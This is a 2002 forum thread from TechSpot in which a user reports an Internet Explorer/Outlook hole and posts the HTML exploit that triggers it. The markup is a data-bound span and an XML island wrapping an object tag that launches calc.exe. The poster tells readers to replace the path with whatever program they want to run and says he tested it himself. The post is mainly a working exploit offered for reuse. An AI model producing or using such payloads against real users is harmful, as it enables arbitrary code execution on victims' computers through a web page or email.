also @ TechSpot: Google challenges U.S. gag order, citing First Amendment

TechSpot

TechSpot News Products Downloads Forums

About
Sign in

Welcome to TechSpot

Why should I register?

Sign up for a new account or log in here:

Forgot your password?

Couldn't sign you in, please try again.

Another IE/Outlook Hole

Discussion in 'General Discussion' started by lokem, Mar 6, 2002.

lokem Newcomer, in training Posts: 773

The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

Read the rest here:

http://www.theregister.co.uk/content/4/24274.html

The article also has a simple fix for this problem.

Here's the simple script:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>

Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.

lokem, Mar 6, 2002

#1

Topic Status:: Not open for further replies.

Add New Comment

	TechSpot Members Login or sign up for free, it takes about 30 seconds.			You may also...
Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.